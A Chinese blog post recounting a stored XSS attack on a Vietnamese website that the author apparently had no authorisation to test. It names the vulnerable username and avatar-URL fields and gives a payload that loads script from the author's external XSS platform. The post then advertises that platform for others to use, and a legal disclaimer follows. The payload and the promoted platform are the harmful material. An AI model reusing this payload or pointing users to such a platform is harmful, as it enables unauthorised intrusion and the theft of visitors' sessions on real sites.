作者:Mr.Wu,文章来源:https://www.mrwu.red/web/3677.html
很久没更新博客了呢,突然发现不知道从啥时候开始,本站的 XSS 平台也没有了新用户注册了;
于是有了今天这篇科普文,来给大家秀下本站的 XSS 平台呢~
开局一张图。。。
我也不知道这是个啥站,一堆鸟文看不懂,不过不影响咱们插他。
有2个地方可以插,一个是会员注册,不懂为什么对用户名没有进行格式验证:
第二个地方是注册登录后,用户信息修改-头像修改处,不能自定义头像,但是可以选择自带的一些头像,因此通过抓包修改图片的地址即可:
payload:
"><sCRiPt/SrC=//xss.red/b>
接下来到了本文的重要环节了,本站的 XSS 平台广告时间~
是不是简洁方便易看易操作?
模块我就不秀了,没啥好看的,支持自定义模块,所以想要啥模块自己添加就行了。都一个样~
XSS平台地址:https://www.mrwu.red/xss/
扫描关注乌云安全
觉得不错点个“赞”、“在看”哦
本文始发于微信公众号(乌雲安全):记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论